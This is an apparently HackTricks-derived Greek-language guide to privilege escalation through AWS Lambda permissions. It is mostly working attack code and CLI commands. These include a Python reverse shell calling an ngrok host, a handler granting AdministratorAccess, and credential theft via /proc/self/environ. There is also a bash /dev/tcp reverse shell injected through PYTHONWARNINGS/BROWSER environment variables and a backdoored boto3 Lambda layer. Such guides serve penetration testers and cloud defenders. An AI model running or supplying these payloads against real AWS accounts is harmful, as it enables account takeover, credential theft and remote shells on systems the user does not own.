AWS - Lambda Privesc

lambda

Περισσότερες πληροφορίες σχετικά με το lambda στο:

iam:PassRole, lambda:CreateFunction, (lambda:InvokeFunction | lambda:InvokeFunctionUrl)

Χρήστες με τα δικαιώματα iam:PassRole, lambda:CreateFunction, και lambda:InvokeFunction μπορούν να αναβαθμίσουν τα προνόμιά τους. Μπορούν να δημιουργήσουν μια νέα Lambda function και να της αναθέσουν έναν υπάρχοντα IAM ρόλο, παρέχοντας στη λειτουργία τα δικαιώματα που σχετίζονται με αυτόν τον ρόλο. Ο χρήστης μπορεί στη συνέχεια να γράψει και να ανεβάσει κώδικα σε αυτή τη Lambda function (με ένα rev shell για παράδειγμα). Αφού ρυθμιστεί η λειτουργία, ο χρήστης μπορεί να προκαλέσει την εκτέλεσή της και τις προγραμματισμένες ενέργειες καλώντας τη Lambda function μέσω του AWS API. Αυτή η προσέγγιση επιτρέπει στον χρήστη να εκτελεί εργασίες έμμεσα μέσω της Lambda function, λειτουργώντας με το επίπεδο πρόσβασης που παρέχεται από τον IAM ρόλο που σχετίζεται με αυτήν.\

Ένας επιτιθέμενος θα μπορούσε να εκμεταλλευτεί αυτό για να αποκτήσει ένα rev shell και να κλέψει το token:

import socket,subprocess,os,time
def lambda_handler(event, context):
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(('4.tcp.ngrok.io',14305))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(['/bin/sh','-i'])
time.sleep(900)
return 0

# Zip the rev shell
zip "rev.zip" "rev.py"

# Create the function
aws lambda create-function --function-name my_function \
--runtime python3.9 --role <arn_of_lambda_role> \
--handler rev.lambda_handler --zip-file fileb://rev.zip

# Invoke the function
aws lambda invoke --function-name my_function output.txt
## If you have the lambda:InvokeFunctionUrl permission you need to expose the lambda inan URL and execute it via the URL

# List roles
aws iam list-attached-user-policies --user-name <user-name>

Μπορείτε επίσης να καταχραστείτε τα δικαιώματα ρόλου lambda από τη λειτουργία lambda ίδια. Εάν ο ρόλος lambda είχε αρκετά δικαιώματα, θα μπορούσατε να τον χρησιμοποιήσετε για να σας παραχωρήσει δικαιώματα διαχειριστή:

import boto3
def lambda_handler(event, context):
client = boto3.client('iam')
response = client.attach_user_policy(
UserName='my_username',
PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess'
)
return response

Είναι επίσης δυνατό να διαρρεύσουν τα διαπιστευτήρια ρόλου της lambda χωρίς να χρειάζεται εξωτερική σύνδεση. Αυτό θα ήταν χρήσιμο για Network isolated Lambdas που χρησιμοποιούνται σε εσωτερικές εργασίες. Εάν υπάρχουν άγνωστες ομάδες ασφαλείας που φιλτράρουν τα αντίστροφα κέλυφά σας, αυτό το κομμάτι κώδικα θα σας επιτρέψει να διαρρεύσετε απευθείας τα διαπιστευτήρια ως έξοδο της lambda.

def handler(event, context):
sessiontoken = open('/proc/self/environ', "r").read()
return {
'statusCode': 200,
'session': str(sessiontoken)
}

aws lambda invoke --function-name <lambda_name> output.txt
cat output.txt

Πιθανές Επιπτώσεις: Άμεση εκχώρηση δικαιωμάτων στην αυθαίρετη υπηρεσία ρόλου lambda που καθορίζεται.

iam:PassRole, lambda:CreateFunction, lambda:AddPermission

Όπως στο προηγούμενο σενάριο, μπορείτε να παραχωρήσετε στον εαυτό σας την άδεια lambda:InvokeFunction αν έχετε την άδεια lambda:AddPermission

# Check the previous exploit and use the following line to grant you the invoke permissions
aws --profile "$NON_PRIV_PROFILE_USER" lambda add-permission --function-name my_function \
--action lambda:InvokeFunction --statement-id statement_privesc --principal "$NON_PRIV_PROFILE_USER_ARN"

Πιθανές Επιπτώσεις: Άμεση εκμετάλλευση των δικαιωμάτων στην αυθαίρετη υπηρεσία ρόλου lambda που καθορίζεται.

iam:PassRole, lambda:CreateFunction, lambda:CreateEventSourceMapping

Χρήστες με iam:PassRole, lambda:CreateFunction, και lambda:CreateEventSourceMapping δικαιώματα (και πιθανώς dynamodb:PutItem και dynamodb:CreateTable) μπορούν έμμεσα να κλιμακώσουν τα δικαιώματα ακόμη και χωρίς lambda:InvokeFunction. Μπορούν να δημιουργήσουν μια λειτουργία Lambda με κακόβουλο κώδικα και να της αναθέσουν έναν υπάρχοντα ρόλο IAM.

Αντί να καλέσουν άμεσα τη Lambda, ο χρήστης ρυθμίζει ή χρησιμοποιεί έναν υπάρχοντα πίνακα DynamoDB, συνδέοντάς τον με τη Lambda μέσω ενός χάρτη πηγής γεγονότος. Αυτή η ρύθμιση διασφαλίζει ότι η λειτουργία Lambda ενεργοποιείται αυτόματα με την είσοδο ενός νέου στοιχείου στον πίνακα, είτε από την ενέργεια του χρήστη είτε από μια άλλη διαδικασία, ενεργοποιώντας έτσι έμμεσα τη λειτουργία Lambda και εκτελώντας τον κώδικα με τα δικαιώματα του περασμένου ρόλου IAM.

aws lambda create-function --function-name my_function \
--runtime python3.8 --role <arn_of_lambda_role> \
--handler lambda_function.lambda_handler \
--zip-file fileb://rev.zip

Αν το DynamoDB είναι ήδη ενεργό στο περιβάλλον AWS, ο χρήστης μόνο χρειάζεται να καθορίσει την αντιστοίχιση πηγής γεγονότων για τη λειτουργία Lambda. Ωστόσο, αν το DynamoDB δεν χρησιμοποιείται, ο χρήστης πρέπει να δημιουργήσει έναν νέο πίνακα με ενεργοποιημένη τη ροή:

aws dynamodb create-table --table-name my_table \
--attribute-definitions AttributeName=Test,AttributeType=S \
--key-schema AttributeName=Test,KeyType=HASH \
--provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \
--stream-specification StreamEnabled=true,StreamViewType=NEW_AND_OLD_IMAGES

Τώρα είναι δυνατόν να συνδέσετε τη λειτουργία Lambda με τον πίνακα DynamoDB δημιουργώντας μια αντιστοίχιση πηγής γεγονότων:

aws lambda create-event-source-mapping --function-name my_function \
--event-source-arn <arn_of_dynamodb_table_stream> \
--enabled --starting-position LATEST

Με τη λειτουργία Lambda συνδεδεμένη με το ρεύμα DynamoDB, ο επιτιθέμενος μπορεί έμμεσα να ενεργοποιήσει τη Lambda ενεργοποιώντας το ρεύμα DynamoDB. Αυτό μπορεί να επιτευχθεί με την εισαγωγή ενός στοιχείου στον πίνακα DynamoDB:

aws dynamodb put-item --table-name my_table \
--item Test={S="Random string"}

Πιθανές Επιπτώσεις: Άμεσο privesc στον ρόλο υπηρεσίας lambda που έχει καθοριστεί.

lambda:AddPermission

Ένας επιτιθέμενος με αυτή την άδεια μπορεί να παραχωρήσει στον εαυτό του (ή σε άλλους) οποιεσδήποτε άδειες (αυτό δημιουργεί πολιτικές βάσει πόρων για να παραχωρήσει πρόσβαση στον πόρο):

# Give yourself all permissions (you could specify granular such as lambda:InvokeFunction or lambda:UpdateFunctionCode)
aws lambda add-permission --function-name <func_name> --statement-id asdasd --action '*' --principal arn:<your user arn>

# Invoke the function
aws lambda invoke --function-name <func_name> /tmp/outout

Πιθανές Επιπτώσεις: Άμεση εκμετάλλευση δικαιωμάτων στην υπηρεσία lambda που χρησιμοποιείται δίνοντας άδεια να τροποποιήσει τον κώδικα και να τον εκτελέσει.

lambda:AddLayerVersionPermission

Ένας επιτιθέμενος με αυτή την άδεια μπορεί να παραχωρήσει στον εαυτό του (ή σε άλλους) την άδεια lambda:GetLayerVersion. Μπορεί να έχει πρόσβαση στο layer και να αναζητήσει ευπάθειες ή ευαίσθητες πληροφορίες.

# Give everyone the permission lambda:GetLayerVersion
aws lambda add-layer-version-permission --layer-name ExternalBackdoor --statement-id xaccount --version-number 1 --principal '*' --action lambda:GetLayerVersion

Πιθανές Επιπτώσεις: Πιθανή πρόσβαση σε ευαίσθητες πληροφορίες.

lambda:UpdateFunctionCode

Οι χρήστες που κατέχουν την άδεια lambda:UpdateFunctionCode έχουν τη δυνατότητα να τροποποιήσουν τον κώδικα μιας υπάρχουσας Lambda λειτουργίας που είναι συνδεδεμένη με έναν ρόλο IAM. Ο επιτιθέμενος μπορεί να τροποποιήσει τον κώδικα της lambda για να εξάγει τα διαπιστευτήρια IAM.

Αν και ο επιτιθέμενος μπορεί να μην έχει την άμεση ικανότητα να καλέσει τη λειτουργία, αν η Lambda λειτουργία είναι προϋπάρχουσα και λειτουργική, είναι πιθανό να ενεργοποιηθεί μέσω υπαρχουσών ροών εργασίας ή γεγονότων, διευκολύνοντας έτσι έμμεσα την εκτέλεση του τροποποιημένου κώδικα.

# The zip should contain the lambda code (trick: Download the current one and add your code there)
aws lambda update-function-code --function-name target_function \
--zip-file fileb:///my/lambda/code/zipped.zip

# If you have invoke permissions:
aws lambda invoke --function-name my_function output.txt

# If not check if it's exposed in any URL or via an API gateway you could access

Πιθανές Επιπτώσεις: Άμεσο privesc στον ρόλο υπηρεσίας lambda που χρησιμοποιείται.

lambda:UpdateFunctionConfiguration

RCE μέσω μεταβλητών περιβάλλοντος

Με αυτές τις άδειες είναι δυνατόν να προστεθούν μεταβλητές περιβάλλοντος που θα προκαλέσουν την εκτέλεση αυθαίρετου κώδικα από το Lambda. Για παράδειγμα, στην python είναι δυνατόν να καταχραστεί κανείς τις μεταβλητές περιβάλλοντος PYTHONWARNING και BROWSER για να εκτελέσει μια διαδικασία python αυθαίρετες εντολές:

aws --profile none-priv lambda update-function-configuration --function-name <func-name> --environment "Variables={PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=\"/bin/bash -c 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18755 0>&1' & #%s\"}"

Για άλλες γλώσσες scripting υπάρχουν άλλες μεταβλητές περιβάλλοντος που μπορείτε να χρησιμοποιήσετε. Για περισσότερες πληροφορίες, ελέγξτε τις υποενότητες των γλωσσών scripting στο:

macOS Process Abuse | HackTricks

RCE μέσω Lambda Layers

Lambda Layers επιτρέπει να συμπεριλάβετε κώδικα στη λειτουργία σας lambda αλλά να τον αποθηκεύσετε ξεχωριστά, έτσι ώστε ο κώδικας της λειτουργίας να παραμένει μικρός και πολλές λειτουργίες να μπορούν να μοιράζονται κώδικα.

Μέσα στη lambda μπορείτε να ελέγξετε τις διαδρομές από όπου φορτώνεται ο κώδικας python με μια συνάρτηση όπως η εξής:

import json
import sys

def lambda_handler(event, context):
print(json.dumps(sys.path, indent=2))

Αυτά είναι τα μέρη:

1. /var/task

2. /opt/python/lib/python3.7/site-packages

3. /opt/python

4. /var/runtime

5. /var/lang/lib/python37.zip

6. /var/lang/lib/python3.7

7. /var/lang/lib/python3.7/lib-dynload

8. /var/lang/lib/python3.7/site-packages

9. /opt/python/lib/python3.7/site-packages

10. /opt/python

Για παράδειγμα, η βιβλιοθήκη boto3 φορτώνεται από το /var/runtime/boto3 (4η θέση).

Εκμετάλλευση

Είναι δυνατόν να καταχραστεί η άδεια lambda:UpdateFunctionConfiguration για να προσθέσετε μια νέα στρώση σε μια συνάρτηση lambda. Για να εκτελέσετε αυθαίρετο κώδικα, αυτή η στρώση πρέπει να περιέχει κάποια βιβλιοθήκη που η lambda πρόκειται να εισάγει. Αν μπορείτε να διαβάσετε τον κώδικα της lambda, θα μπορούσατε να το βρείτε εύκολα, σημειώστε επίσης ότι μπορεί να είναι δυνατόν η lambda να χρησιμοποιεί ήδη μια στρώση και θα μπορούσατε να κατεβάσετε τη στρώση και να προσθέσετε τον κώδικά σας εκεί.

Για παράδειγμα, ας υποθέσουμε ότι η lambda χρησιμοποιεί τη βιβλιοθήκη boto3, αυτό θα δημιουργήσει μια τοπική στρώση με την τελευταία έκδοση της βιβλιοθήκης:

pip3 install -t ./lambda_layer boto3

Μπορείτε να ανοίξετε ./lambda_layer/boto3/__init__.py και να προσθέσετε την πίσω πόρτα στον παγκόσμιο κώδικα (μια συνάρτηση για να εξάγετε διαπιστευτήρια ή να αποκτήσετε ένα reverse shell για παράδειγμα).

Στη συνέχεια, συμπιέστε αυτόν τον φάκελο ./lambda_layer και ανεβάστε τη νέα λωρίδα lambda στον δικό σας λογαριασμό (ή στον λογαριασμό των θυμάτων, αλλά μπορεί να μην έχετε άδειες για αυτό). Σημειώστε ότι πρέπει να δημιουργήσετε έναν φάκελο python και να βάλετε τις βιβλιοθήκες εκεί για να αντικαταστήσετε το /opt/python/boto3. Επίσης, η λωρίδα πρέπει να είναι συμβατή με την έκδοση python που χρησιμοποιείται από τη lambda και αν την ανεβάσετε στον λογαριασμό σας, πρέπει να είναι στην ίδια περιοχή:

aws lambda publish-layer-version --layer-name "boto3" --zip-file file://backdoor.zip --compatible-architectures "x86_64" "arm64" --compatible-runtimes "python3.9" "python3.8" "python3.7" "python3.6"

Τώρα, κάντε το ανεβασμένο lambda layer προσβάσιμο από οποιονδήποτε λογαριασμό:

aws lambda add-layer-version-permission --layer-name boto3 \
--version-number 1 --statement-id public \
--action lambda:GetLayerVersion --principal *

Και επισυνάψτε το lambda layer στη θυματική lambda function:

aws lambda update-function-configuration \
--function-name <func-name> \
--layers arn:aws:lambda:<region>:<attacker-account-id>:layer:boto3:1 \
--timeout 300 #5min for rev shells

Το επόμενο βήμα θα ήταν είτε να καλέσουμε τη λειτουργία εμείς οι ίδιοι αν μπορούμε είτε να περιμένουμε μέχρι να καλεστεί με κανονικά μέσα – που είναι η ασφαλέστερη μέθοδος.

Μια πιο διακριτική μέθοδος για να εκμεταλλευτούμε αυτή την ευπάθεια μπορεί να βρεθεί στο:

Πιθανές Επιπτώσεις: Άμεση privesc στο ρόλο υπηρεσίας lambda που χρησιμοποιείται.

iam:PassRole, lambda:CreateFunction, lambda:CreateFunctionUrlConfig, lambda:InvokeFunctionUrl

Ίσως με αυτές τις άδειες να είστε σε θέση να δημιουργήσετε μια λειτουργία και να την εκτελέσετε καλώντας τη διεύθυνση URL... αλλά δεν μπόρεσα να βρω έναν τρόπο να το δοκιμάσω, οπότε ενημερώστε με αν το κάνετε!

Lambda MitM

Ορισμένες lambdas θα λαμβάνουν ευαίσθητες πληροφορίες από τους χρήστες ως παραμέτρους. Αν αποκτήσετε RCE σε μία από αυτές, μπορείτε να εξάγετε τις πληροφορίες που στέλνουν άλλοι χρήστες σε αυτήν, ελέγξτε το στο:

Αναφορές

• https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/

• https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/